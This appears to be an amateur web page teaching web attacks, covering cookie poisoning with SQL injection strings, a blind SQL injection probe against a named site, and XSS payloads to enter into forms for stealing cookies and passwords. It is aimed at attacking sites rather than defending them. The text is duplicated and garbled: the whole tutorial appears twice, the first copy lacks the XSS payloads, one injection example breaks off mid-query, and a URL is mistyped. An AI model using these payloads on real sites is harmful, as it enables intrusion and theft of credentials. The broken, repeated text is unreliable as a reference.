Main:advertisement
By me!
/**********************************************************************************************************************
Hello, this is mr me and i am going to introduce you with:
**********************************************************************************************************************/
|----------------------------------------------------------------------------------------------------------------------|
Cookie Poisoning
|----------------------------------------------------------------------------------------------------------------------|
Well, for a starters i can begin with saying that Cookie Poisoning is alot like SQL Injection
Both have 'OR'1'='1 or maybe '1'='1'
But in cookie poisoning you begin with alerting your cookies
Javascript:alert(document.cookie)
Then you will perharps see "username=JohnDoe" and "password=iloveJaneDoe"
in this case the cookie poisoning could be:
Javascript:void(document.cookie="username='OR'1'='1"); void(document.cookie="password='OR'1'='1");
It is also many versions of this kind... like for example
'
'1'='1'
'OR'1'='1
'OR'1'='1'OR'
and so on...
You may have to try 13 things before you get it completely right...
|----------------------------------------------------------------------------------------------------------------------|
Blind SQL Injection
|----------------------------------------------------------------------------------------------------------------------|
Well, to find out if a page is vulnerable to Blind SQL Injection you can test it this way for example:
http://www.darkmindz.com/index.php?id=2
now this query is asking the DB to SELECT (require data) FROM (required form) WHERE id = 2.
We can exploit this by adding your own special little query on the end... For example:
http://www,darkmindz.com/index.php?id=2 AND 1=
|----------------------------------------------------------------------------------------------------------------------|
XSS (Cross site scripting)
|----------------------------------------------------------------------------------------------------------------------|
XSS is used by attackers to steal cookies which means that the attacker can access PHPSESSID's, username's, -
password's and all that..
How to use it?
In contact boxes or forms and all possible things you can enter something like this:
you can also use other commands like this:
So you see this can be very useful...
Try googleing for XSS to get more info about it
|----------------------------------------------------------------------------------------------------------------------|
Thanks for looking at my article, please rate and comment...
|----------------------------------------------------------------------------------------------------------------------|
/***********************************************************************************************************************
Ending Transmission_
***********************************************************************************************************************/
Hello, this is mr me and i am going to introduce you with:
**********************************************************************************************************************/
|----------------------------------------------------------------------------------------------------------------------|
Cookie Poisoning
|----------------------------------------------------------------------------------------------------------------------|
Well, for a starters i can begin with saying that Cookie Poisoning is alot like SQL Injection
Both have 'OR'1'='1 or maybe '1'='1'
But in cookie poisoning you begin with alerting your cookies
Javascript:alert(document.cookie)
Then you will perharps see "username=JohnDoe" and "password=iloveJaneDoe"
in this case the cookie poisoning could be:
Javascript:void(document.cookie="username='OR'1'='1"); void(document.cookie="password='OR'1'='1");
It is also many versions of this kind... like for example
'
'1'='1'
'OR'1'='1
'OR'1'='1'OR'
and so on...
You may have to try 13 things before you get it completely right...
|----------------------------------------------------------------------------------------------------------------------|
Blind SQL Injection
|----------------------------------------------------------------------------------------------------------------------|
Well, to find out if a page is vulnerable to Blind SQL Injection you can test it this way for example:
http://www.darkmindz.com/index.php?id=2
now this query is asking the DB to SELECT (require data) FROM (required form) WHERE id = 2.
We can exploit this by adding your own special little query on the end... For example:
http://www,darkmindz.com/index.php?id=2 AND 1=
|----------------------------------------------------------------------------------------------------------------------|
XSS (Cross site scripting)
|----------------------------------------------------------------------------------------------------------------------|
XSS is used by attackers to steal cookies which means that the attacker can access PHPSESSID's, username's, -
password's and all that..
How to use it?
In contact boxes or forms and all possible things you can enter something like this:
<script>alert("owned by cLtmstr")</script>you can also use other commands like this:
<img src="banner.png" onerror="alert('owned by cLtmstr')"> So you see this can be very useful...
Try googleing for XSS to get more info about it
|----------------------------------------------------------------------------------------------------------------------|
Thanks for looking at my article, please rate and comment...
|----------------------------------------------------------------------------------------------------------------------|
/***********************************************************************************************************************
Ending Transmission_
***********************************************************************************************************************/
Posted by 
